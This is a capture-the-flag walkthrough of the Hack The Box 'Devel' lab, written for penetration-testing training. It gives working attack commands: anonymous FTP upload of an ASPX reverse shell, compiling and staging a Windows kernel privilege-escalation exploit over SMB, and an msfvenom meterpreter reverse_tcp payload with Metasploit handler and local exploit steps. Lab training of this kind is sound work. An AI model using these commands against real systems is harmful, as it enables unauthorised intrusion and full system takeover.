Hack the Box Challenge: Devel Walkthrough
We are going to play with the DEVEL machine of Hack the box. Here we will learn how to pwn the machine and access the privilege shell. Our perspective to exploit the machine by the manual method to follow the OSCP level also. Devel –Hack the box lab is an online machine and has the static IP 10.129.226.65.
Task: Capture the user.txt and root.txt flag
Penetration Testing Methodologies
Manual Method (OSCP)
- Writable FTP
- aspx shell upload
- Capture user.txt file
- Kernel Privilege escalation
- Administrator Privileges
Automate Method (Metasploit)
The first thing to do is Nmap scanning to identify the open ports and services for which we will aggressively run the scan.
nmap –A 10.129.226.65
Through the enumeration, we get to know that only two ports are open i.e. port 80 –HTTP with Microsoft IIS web server and port 21 –FTP show that anonymous login is allowed.
So now our only avenue of attack is through port 80 and port 21.
In the first look, we navigate to port 80 in the browser only home page is appearing.
Let’s move toward the port FTP.
As FTP Anonymous login vulnerability is appeared in the Nmap Scan, by using that, we are going to log in FTP, Username: Anonymous, and Password: Anonymous.
Okay, we’re in! Current directory has three files.
We know that IIS 7 generally either executes ASPX (ASP.NET) or ASP.
So, we are likely to Google the aspx reverse shell.
An attacker (kali) machine, download the reverse shell aspx file uing the below command:
Open the shell.aspx file and edit the IP address (I.e. Kali’s IP Address ) or can change port also (optional).
Back to the FTP, OPPS!! The connection gets close. So again login to the FTP and upload the reverse shell aspx as shown in the below image,
Shell.aspx file has been uploaded on the FTP server.
To run the malicious script (shell. aspx) execute the following url in the web browser and simultaneously start a netcat listener on the attack machine to receive the reverse shell when it’s executed.
Boooom!!! We will get the netcat session. Do the post enumeration to fetch the flag file. But unfortunately, access is denied on babis and the administrator directory.
So, let’s move forward to check the system info focus on OS Name and Version i.e. Microsoft Windows7 N/A Build 7600, so probably vulnerable to a bunch of exploits.
Let’s google to check the Microsoft Windows 7 exploits
The kernel exploit (MS11-046) allows us to escalate privileges. So we will go with this exploit.
On the attack (Kali) machine, Searchsploit EDB id 40564 to know the concern exploits.
Ohh nice!! We get the Local Priviliege escalation to exploit and its C file by default copied to the current directory.
Now time to compile the exploit, for compilation,mingw-64 must be installed. If we don’t have then we can install it from the below command:
apt install mingw-64
Start the compilation by using the below command and output file name as shell.exe
i686-w64-mingw32-gcc 40564.c -o shell.exe -lws2_32
After compilation, our next motto is to just transfer the executable file into the victim’s machine. There are multiple methods to transfer the file, our favorite one is SMB file transfer.
We start the impacket smbserver utility and the smb share folder will configure under the name “share”.Follow the below command
impacket-smbserver share $(pwd) -smb2support
As the Public directory has accessible permission so we copy the shell.exe into it. Now the file is the Users/Public Directory.
Well done!! Finally, we execute the shell.exe and as soon as it executes, the exploit will work and escalate the privileges.
“NTauthority/System “We Have system!!!
Now enumerate the babis and administrator directories to capture the user.txt flag.
We already had a netcat session at the attacker’s machine (kali),here also we can execute the shell.exe file.
Automate Method (Metasploit)
Let’s use msfvenom to generate the reverse shell. Below is the command to generate the aspx payload.
msfvenom –p windows/meterpreter/reverse_tcp lhost=10.10.14.123 lport=4444 –f aspx > revshell.aspx
Already we have discussed in the manual method, regarding the FTP vulnerability of anonymous login. By using the same we log in to the FTP and upload the rev shell.aspx onto the web server’s root directory.
After file transfer, we navigate the aspx file in the browser.
On the other hand, we are starting msfconsole, selecting multi handler module with reverse shell payload, and running the exploit.
msfconsole –q set payload windows/meterpreter/reverse_tcp set lhost 10.10.14.123 set lport 4444 exploit
We get the meterpreter session 1.
As we know web server IIS7 version 6.1.700 is old and exploitable so we search the exploit according and get the ms10_015_kitrap0d exploit module. Now, selecting this module and setting on session 1 we run the exploit.
use exploit/windows/local/ms10_015_kitrap0d set lhost 10.10.14..123 set lport 8888 set session 1 exploit
Great!!! We have a meterpreter session again and through getuid, we get to know that we have a system-level shell. Now get the user’s flag as captured in the manual method above.
Author: Nisha Sharma is an Experienced and Certified Security Consultant.Highly skilled in Infrastructure, web pentesting along with SIEM and other security devices. Connect with her here